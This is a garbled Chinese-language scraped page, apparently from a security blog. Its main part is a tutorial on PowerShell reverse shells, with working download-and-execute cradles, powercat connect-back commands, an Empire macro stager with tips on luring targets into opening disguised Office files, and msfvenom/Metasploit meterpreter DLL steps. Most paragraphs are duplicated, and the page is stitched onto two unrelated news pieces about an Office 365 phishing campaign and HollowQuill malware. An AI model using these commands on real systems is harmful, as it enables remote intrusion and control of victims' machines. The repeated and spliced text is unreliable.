powershell反弹shell常见方式
本文整理了通过powershell反弹shell的常见方式。利用powercat、dnscat2、nishang、Empire、PowerSploit、Metasploit、Cobalt strike、powershell自定义函数等方式反弹TCP/UDP/HTTP/HTTPS/ICMP/DNS等类型shell。
测试环境说明
攻击者:KALI2.0 32位 192.168.159.134
攻击者2:Ubuntu 14.04 LTS 192.168.159.129 (仅在dnscat2 反弹DNS shell中使用)
目标机:Windows Server 2008 X64 192.168.159.138
powercat反弹shell
powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat
攻击者(192.168.159.134)开启监听:
nc -lvp 6666
或者使用powercat监听
powercat -l -p 6666
目标机反弹cmd shell:
powershell IEX (New-Object System.Net.Webclient).DownloadString
('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 192.168.159.134 -p 6666 -e cmd
本文整理了通过powershell反弹shell的常见方式。利用powercat、dnscat2、nishang、Empire、PowerSploit、Metasploit、Cobalt strike、powershell自定义函数等方式反弹TCP/UDP/HTTP/HTTPS/ICMP/DNS等类型shell。
测试环境说明
攻击者:KALI2.0 32位 192.168.159.134
攻击者2:Ubuntu 14.04 LTS 192.168.159.129 (仅在dnscat2 反弹DNS shell中使用)
目标机:Windows Server 2008 X64 192.168.159.138
powercat反弹shell
powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat
攻击者(192.168.159.134)开启监听:
nc -lvp 6666
或者使用powercat监听
powercat -l -p 6666
目标机反弹cmd shell:
powershell IEX (New-Object System.Net.Webclient).DownloadString
('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 192.168.159.134 -p 6666 -e cmd
利用office 宏反弹shell
攻击者(192.168.159.134)开启监听:
uselistener http
execute
back
usestager windows/macro http #生成payload
execute
生成/tmp/macro 攻击代码后,新建一个word 创建宏
攻击者(192.168.159.134)开启监听:
uselistener http
execute
back
usestager windows/macro http #生成payload
execute
生成/tmp/macro 攻击代码后,新建一个word 创建宏
点击“文件”-“宏”-“创建”,删除自带的脚本,复制进去/tmp/macro文件内容,并保存为“Word 97-2003文档(.doc)”或者“启用宏的Word 文档(.docm)”文件,当诱导目标打开,执行宏后,即可成功反弹shell:
说明:需要开启宏或者用户手动启用宏。开启宏设置:“文件”-“选项”-“信任中心”,选择“启用所有宏”
说明:需要开启宏或者用户手动启用宏。开启宏设置:“文件”-“选项”-“信任中心”,选择“启用所有宏”
在word中“插入”-“对象”-“由文件创建” 处,插入launcher.bat文件,可更改文件名称和图标,进行伪装,当诱导目标点击launcher_lltest.xls文件,执行后,即可成功反弹shell
PowerSploit DLL注入反弹shell
PowerSploit是又一款基于powershell的后渗透攻击框架。PowerSploit包括Inject-Dll(注入dll到指定进程)、Inject-Shellcode(注入shellcode到执行进程)等功能。
利用msfvenom、metasploit和PowerSploit中的Invoke-DllInjection.ps1 实现dll注入,反弹shell
1)msfvenom生成dll后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.134 lport=6667 -f dll -o /var/www/html/PowerSploit/lltest.dll
说明:目标机64位 用x64 ; 32位的话用windows/meterpreter/reverse_tcp
metasploit 设置payload 开启监听
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.159.134
set LPORT 6667
exploit
PowerSploit是又一款基于powershell的后渗透攻击框架。PowerSploit包括Inject-Dll(注入dll到指定进程)、Inject-Shellcode(注入shellcode到执行进程)等功能。
利用msfvenom、metasploit和PowerSploit中的Invoke-DllInjection.ps1 实现dll注入,反弹shell
1)msfvenom生成dll后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.134 lport=6667 -f dll -o /var/www/html/PowerSploit/lltest.dll
说明:目标机64位 用x64 ; 32位的话用windows/meterpreter/reverse_tcp
metasploit 设置payload 开启监听
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.159.134
set LPORT 6667
exploit
metasploit反弹shell
利用metasploit的web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell
攻击者(192.168.159.134)
利用metasploit的web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell
攻击者(192.168.159.134)
目标机执行powershell payload:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.159.134:83/a'))"
6)成功反弹shell后,右键interact 进入shell
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.159.134:83/a'))"
6)成功反弹shell后,右键interact 进入shell
邮件攻击再升级:Microsoft Office 365 用户面临凭据窃取与恶意软件双重危机
一场复杂的网络攻击活动已经出现,攻击者采用双重威胁手段,既能同时窃取 Microsoft Office 365 的凭据,又能将恶意软件传递给毫无防备的受害者。
这种混合攻击始于伪装成来自合法文件共享服务的文件删除提醒的欺骗性电子邮件,营造出一种虚假的紧迫感,促使用户立即采取行动以保存所谓的重要文件。
此次攻击巧妙地利用了用户的信任,将合法的云存储平台 files.fm 作为其初始传播机制。
收件人会收到有关即将删除文件的警告,邮件主题行提及商业文件,促使他们点击超链接的文档名称,这些链接会将他们引导至真实的 files.fm 页面。
这种方式极大地提高了攻击的可信度,因为在感染链的早期阶段,用户是在与一个真实的文件共享服务进行交互。
Cofense 网络钓鱼防御中心(PDC)的研究人员发现了这一攻击活动,并指出了其特别阴险的 “二选一” 攻击方式。
在下载并打开共享的 PDF 文件后,用户会面临两个看似无害的选项:“预览” 或 “下载”—— 而每个选项都会导致不同但同样具有破坏性的后果。
这种分叉式的攻击路径通过提供多种入侵途径,将攻击成功率最大化。
当用户选择 “预览” 时,凭据窃取组件就会启动。这一操作会将受害者重定向到一个看似可信但实则欺诈的 Microsoft 登录页面,该页面与真实的 Microsoft 登录界面极为相似。
虽然该页面具有人们熟悉的 Microsoft 品牌元素,但也包含一些细微的不一致之处,比如非 Microsoft 域名的网址。
然而,这些警示信号在当时往往会被忽视,当用户尝试进行身份验证时,就会导致凭据被盗。
另一方面,选择 “下载” 则会触发伪装成 “SecuredOneDrive.ClientSetup.exe” 的恶意软件的安装。
这个可执行文件伪装成合法的 Microsoft 软件,而实际上会部署 ConnectWise 远程访问木马(ConnectWise RAT),这是一种恶意工具,它利用合法的远程管理软件来实现未经授权的系统访问。
一场复杂的网络攻击活动已经出现,攻击者采用双重威胁手段,既能同时窃取 Microsoft Office 365 的凭据,又能将恶意软件传递给毫无防备的受害者。
这种混合攻击始于伪装成来自合法文件共享服务的文件删除提醒的欺骗性电子邮件,营造出一种虚假的紧迫感,促使用户立即采取行动以保存所谓的重要文件。
此次攻击巧妙地利用了用户的信任,将合法的云存储平台 files.fm 作为其初始传播机制。
收件人会收到有关即将删除文件的警告,邮件主题行提及商业文件,促使他们点击超链接的文档名称,这些链接会将他们引导至真实的 files.fm 页面。
这种方式极大地提高了攻击的可信度,因为在感染链的早期阶段,用户是在与一个真实的文件共享服务进行交互。
Cofense 网络钓鱼防御中心(PDC)的研究人员发现了这一攻击活动,并指出了其特别阴险的 “二选一” 攻击方式。
在下载并打开共享的 PDF 文件后,用户会面临两个看似无害的选项:“预览” 或 “下载”—— 而每个选项都会导致不同但同样具有破坏性的后果。
这种分叉式的攻击路径通过提供多种入侵途径,将攻击成功率最大化。
当用户选择 “预览” 时,凭据窃取组件就会启动。这一操作会将受害者重定向到一个看似可信但实则欺诈的 Microsoft 登录页面,该页面与真实的 Microsoft 登录界面极为相似。
虽然该页面具有人们熟悉的 Microsoft 品牌元素,但也包含一些细微的不一致之处,比如非 Microsoft 域名的网址。
然而,这些警示信号在当时往往会被忽视,当用户尝试进行身份验证时,就会导致凭据被盗。
另一方面,选择 “下载” 则会触发伪装成 “SecuredOneDrive.ClientSetup.exe” 的恶意软件的安装。
这个可执行文件伪装成合法的 Microsoft 软件,而实际上会部署 ConnectWise 远程访问木马(ConnectWise RAT),这是一种恶意工具,它利用合法的远程管理软件来实现未经授权的系统访问。
HollowQuill 恶意软件: 利用 PDF 文档威胁政府以及学术机构安全
一场被称为 HollowQuill 的复杂恶意软件攻击活动,已成为对全球学术机构和政府机构的重大威胁。
此次攻击利用了经过伪装的恶意 PDF 文档,这些文档伪装成研究论文、科研经费申请或政府官方文件,诱使毫无防备的受害者启动感染链。
该恶意软件采用了先进的社会工程学策略来提高其攻击成功率,制作出令人信服的诱饵文档,即使是具备安全意识的用户也会认为这些文档是合法的。
一旦打开,这些看似无害的 PDF 文件就会触发一个复杂的多阶段感染过程,该过程旨在躲避检测的同时实现持续驻留。
Broadcom 的分析师们认为,这一攻击活动特别值得关注,因为其具有针对性,并且采用了复杂的规避检测技术。
他们的研究表明,攻击者很可能是出于间谍活动的目的,在追寻政府和学术机构的敏感数据。
这次攻击展示出了极高的技术复杂性,首先是分发包含一个基于.NET 的恶意软件释放器的恶意 RAR 压缩档案。
这一初始的入侵行为会导致部署多个恶意负载,其中包括一个合法的 OneDrive 应用程序,该程序可帮助恶意软件混入正常的系统操作中。
一场被称为 HollowQuill 的复杂恶意软件攻击活动,已成为对全球学术机构和政府机构的重大威胁。
此次攻击利用了经过伪装的恶意 PDF 文档,这些文档伪装成研究论文、科研经费申请或政府官方文件,诱使毫无防备的受害者启动感染链。
该恶意软件采用了先进的社会工程学策略来提高其攻击成功率,制作出令人信服的诱饵文档,即使是具备安全意识的用户也会认为这些文档是合法的。
一旦打开,这些看似无害的 PDF 文件就会触发一个复杂的多阶段感染过程,该过程旨在躲避检测的同时实现持续驻留。
Broadcom 的分析师们认为,这一攻击活动特别值得关注,因为其具有针对性,并且采用了复杂的规避检测技术。
他们的研究表明,攻击者很可能是出于间谍活动的目的,在追寻政府和学术机构的敏感数据。
这次攻击展示出了极高的技术复杂性,首先是分发包含一个基于.NET 的恶意软件释放器的恶意 RAR 压缩档案。
这一初始的入侵行为会导致部署多个恶意负载,其中包括一个合法的 OneDrive 应用程序,该程序可帮助恶意软件混入正常的系统操作中。